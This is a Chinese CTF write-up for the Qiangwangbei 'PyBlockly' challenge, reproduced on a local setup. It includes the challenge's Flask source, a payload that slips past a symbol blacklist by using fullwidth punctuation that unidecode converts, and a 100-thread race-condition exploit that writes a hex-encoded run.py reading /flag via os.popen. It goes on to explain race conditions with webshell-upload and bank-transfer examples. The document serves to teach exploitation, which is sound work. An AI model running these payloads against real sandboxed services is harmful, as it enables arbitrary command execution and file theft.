强网杯WP及复现

  1. PyBlockly
    1. 条件竞争
      1. Python脚本验证条件竞争漏洞示例

PyBlockly

//题目源码
from flask import Flask, request, jsonify
import re
import unidecode
import string
import ast
import sys
import os
import subprocess
import importlib.util
import json

app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False

blacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]"

def module_exists(module_name):

    spec = importlib.util.find_spec(module_name)
    if spec is None:
        return False

    if module_name in sys.builtin_module_names:
        return True
    
    if spec.origin:
        std_lib_path = os.path.dirname(os.__file__)
        
        if spec.origin.startswith(std_lib_path) and not spec.origin.startswith(os.getcwd()):
            return True
    return False

def verify_secure(m):
    for node in ast.walk(m):
        match type(node):
            case ast.Import:  
                print("ERROR: Banned module ")
                return False
            case ast.ImportFrom: 
                print(f"ERROR: Banned module {node.module}")
                return False
    return True

def check_for_blacklisted_symbols(input_text):
    if re.search(blacklist_pattern, input_text):
        return True
    else:
        return False



def block_to_python(block):
    block_type = block['type']
    code = ''
    
    if block_type == 'print':
        text_block = block['inputs']['TEXT']['block']
        text = block_to_python(text_block)  
        code = f"print({text})"
           
    elif block_type == 'math_number':
        
        if str(block['fields']['NUM']).isdigit():      
            code =  int(block['fields']['NUM']) 
        else:
            code = ''
    elif block_type == 'text':
        if check_for_blacklisted_symbols(block['fields']['TEXT']):
            code = ''
        else:
        
            code =  "'" + unidecode.unidecode(block['fields']['TEXT']) + "'"
    elif block_type == 'max':
        
        a_block = block['inputs']['A']['block']
        b_block = block['inputs']['B']['block']
        a = block_to_python(a_block)  
        b = block_to_python(b_block)
        code =  f"max({a}, {b})"

    elif block_type == 'min':
        a_block = block['inputs']['A']['block']
        b_block = block['inputs']['B']['block']
        a = block_to_python(a_block)
        b = block_to_python(b_block)
        code =  f"min({a}, {b})"

    if 'next' in block:
        
        block = block['next']['block']
        
        code +="\n" + block_to_python(block)+ "\n"
    else:
        return code 
    return code

def json_to_python(blockly_data):
    block = blockly_data['blocks']['blocks'][0]

    python_code = ""
    python_code += block_to_python(block) + "\n"

        
    return python_code

def do(source_code):
    hook_code = '''
def my_audit_hook(event_name, arg):
    blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
    if len(event_name) > 4:
        raise RuntimeError("Too Long!")
    for bad in blacklist:
        if bad in event_name:
            raise RuntimeError("No!")

__import__('sys').addaudithook(my_audit_hook)

'''
    print(source_code)
    code = hook_code + source_code
    tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
    try:
        if verify_secure(tree):  
            with open("run.py", 'w') as f:
                f.write(code)        
            result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")
            os.remove('run.py')
            return result
        else:
            return "Execution aborted due to security concerns."
    except:
        os.remove('run.py')
        return "Timeout!"

@app.route('/')
def index():
    return app.send_static_file('index.html')

@app.route('/blockly_json', methods=['POST'])
def blockly_json():
    blockly_data = request.get_data()
    print(type(blockly_data))
    blockly_data = json.loads(blockly_data.decode('utf-8'))
    print(blockly_data)
    try:
        python_code = json_to_python(blockly_data)
        return do(python_code)
    except Exception as e:
        return jsonify({"error": "Error generating Python code", "details": str(e)})
    
if __name__ == '__main__':
    app.run(host = '0.0.0.0')

利用flask模板接受Blockly JSON 数据转换并执行生成的python代码

'; _ _ import_ _("builtins")。 len = lambda a: 1;''; _ _import_ _("os")。 system (“$ (printf ‘ \ 144 \ 144 \ 40 \ 151 \ 146 \ 75 \ 57 \ 146 \ 154 \ 141 \ 147’); ”);’

相关payload

由于官方的环境已经被关掉了,我又弄了个本地的环境,方便我进行复现的操作

贴一下WP大佬的exp

import requests
import json
import threading

url = "http://localhost:5555/"

data = {
    "blocks": {
        "blocks": [
            {
                "type": "print",
                "x": 101,
                "y": 102,
                "inputs": {
                    "TEXT": {
                        "block": {
                            "type": "max",
                            "inputs": {
                                "A": {
                                    "block": {
                                        "type": "text",
                                        "fields": {"TEXT": "‘,‘’))\n(open(bytes。fromhex(’72756e2e7079‘)。decode(),’wb‘)。write(bytes。fromhex(’696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929‘)))\n\nprint(print(’1"}
                                    }
                                },
                                "B": {
                                    "block": {
                                        "type": "math_number",
                                        "fields": {"NUM": 10}
                                    }
                                }
                            }
                        }
                    }
                }
            }
        ]
    }
}

def send_request():
    while True:
        r = requests.post(url + "/blockly_json",
                          headers={"Content-Type": "application/json"}, data=json.dumps(data))
        text = r.text
        if "1 10" not in text and "No such file or direct" not in text and len(text) > 10:
            print(text)
            os.exit(-1)
            break

threads = []
num_threads = 100

for _ in range(num_threads):
    thread = threading.Thread(target=send_request)
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

首先要学会写这样的exp,你得先尝试读懂别人的exp

和这道题相关的东西,比如说 “x”: 101,”y”: 102,这里指的是在某个坐标系统中的位置坐标,这些坐标用于定位某个图形、元素或对象在界面上的位置,在图形界面编程或绘图上下文中,这样的坐标通常用于确定元素的放置位置。例如,在一个画布上绘制形状、文本或其他组件时,会用到这样的坐标系统。

image-20241104200659440

如果你将图中的print “hello”这个模块进行移动的话,相应的xy参数也会发生改变

72756e2e7079对应的字符是run.py,这里就是写了个py文件进行攻击

696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929对应的字符是

import os
print(os.popen('dd if=/flag').read()) 

解释一下这段攻击代码的基本意思

import os 没什么好说的,就是导入Python的os模块,允许使用与操作系统交互的功能

os.popen(‘dd if=/flag’)

使用os.popen函数来执行一个shell命令,这里的命令是dd if=/flag

dd是一个linux下的命令行工具,通常用于低级别的数据复制和转换

if=/flag 指定输入文件为/flag,就是复制flag的内容并且查看

.read() 调用.read()方法从popen返回的文件对象中读取命令的输出

那么为什么要将攻击代码编码为16进制呢,因为这里又有个黑名单会过滤popen这种危险函数,我们还需要做一层绕过

还有就是中间的很多符号比如说() . ,都是用的中文的括号句号和逗号,这是一种绕过的手段,因为中文字符通过unicode.unicode可以直接 转英文字符,即绕过黑名单

这里设置了黑名单,我们是需要绕过的

这个位置就是我们绕过的利用点

max中的A是写攻击代码,B就是正常的代码,没什么问题

if "1 10" not in text and "No such file or direct" not in text and len(text) > 10:

这里就是过滤掉正常的数据包了,如果1 10 No such file or direct出现在数据包中,说明是没有成功执行攻击脚本的,我们只需要执行脚本返回的数据,也就是flag

threads = []
num_threads = 100

for _ in range(num_threads):
    thread = threading.Thread(target=send_request)
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

这里就是开了100个进程去进行条件竞争

然后问题来了,什么是条件竞争,我需要详细的学习一下条件竞争的概念。

条件竞争

形象的形容这个问题,就像是幼儿园发糖吃,每个人只能拿一块,但是如果你跟别人一起再拿一次老师也没办法分辨,毕竟一群小朋友老师也没办法分辨手和对应的人

条件竞争漏洞是一种服务器端的漏洞,由于服务器端会处理不同用户的请求时是并发进行的,因此如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。

譬如说一个文件上传的功能点

<?php
    if(isset($_GET['src'])){
        saveimg($_GET['src']);
        //得到保存路径filename
        //检查文件
        check(filename);
        if(不符合规范)
            delete(filename);
        else
            pass;
    }
?>

如果我们采用大量的并发请求,就传递一个生成恶意webshell的图像以生成webshell,在上传完成和安全检查完成并删除它的间隙,攻击者通过不断地发起访问请求的方法访问了该文件,该文件就会被执行,并且在服务器上生成了一个恶意shell的文件。至此,该文件的任务就已全部完成,至于后面发现它是一个不安全的文件并把它删除的问题都已经不重要了,因为攻击者已经成功的在服务器中植入了一个shell文件,后续的 一切就都不是问题了。

《CTF特训营中》对条件竞争漏洞的解释

条件竞争是指多个线程或者进程在读写一个共享数据时,结果依赖于它们执行的相对时间的情形。当多个线程或进程同时访问相同的共享代码、变量、文件等而没有锁或没有同步互斥管理时,则会触发条件竞争,导致输出不一致的问题。

在编写代码时,由于大部分服务端语言编写的代码是以线性方式执行的,而Web服务器往往是多个线程并行执行,因而很可能会出现一些问题。下面列举一个简单的例子。

有一个银行账户A和一个银行账户B里面各有1000元钱,现在有两名用户同时登录到了账户A,并且两人都想完成同一个操作:从账户A转100元到账户B,那么正常的操作结果应该是两名用户转账结束之后,账户A里面剩余800元,账户B里面剩余1200元。

但是,考虑下面这一种情况,如果两名用户在同一个时刻发起了转账请求,那么服务器的处理过程如下。

1)用户甲发起转账请求,服务器验证账户A的余额为1000元,可以转账。

2)用户乙同时发起转账请求,服务器验证账户A的余额为1000元,可以转账。

3)服务器处理用户甲的请求,从账户A里面扣除100元(此时账户A余额为900元),并将其存入账户B(此时账户B余额为1100元)

4)服务器处理用户乙的请求,从账户A里面扣除100元(此时账户A余额为900元),并将其存入账户B(此时账户B余额为1200元)

5)处理结果:账户A余额为900元,账户B余额为1200元。相当于凭空多出了100元、

出现上述情况的原因就是条件竞争,正常情况下,因为账户A作为一个共享变量,在某一个时刻有且只有一个用户能够操作账户A的余额,但是由于服务器没有进行适当的加锁或是同步互斥管理,使得两个用户同时访问并修改账户A的余额,从而引发错误。

注意,这里所说的同时并非真正意义上的同时,而是两个操作之间时间间隔极小,对比服务端的延迟,可以近似于同时。当然上述示例只是一个说明性的例子,因为仅仅只有两个用户时是很难做到同事的所以在真正实际操作的时候,往往会设置很大的进程数或线程数同时发起请求,从而使得某两个进程或线程能够幸运地做到同时。

PS:所以这道强网杯的题要设置100个进程,这样才可以保证攻击代码会很快就被执行。

Python脚本验证条件竞争漏洞示例
import requests
import threading
from queue import Queue

url = "xxxx"

requests_time = 0
message_queue = Queue()  # 修改为 Queue()
stop = 0

def output():
    global message_queue, stop
    while stop != 1 or not message_queue.empty():
        try:
            msg = message_queue.get()  # 设置超时避免阻塞
            print(msg)
        except:
            continue

def request():
    global requests_time, message_queue
    while requests_time < 1000:
        response = requests.get(url)
        message_queue.put(response.content)
        requests_time += 1

Thread_count = 80
threading.Thread(target=output).start()
for i in range(Thread_count):
    t = threading.Thread(target=request)
    t.start()
stop = 1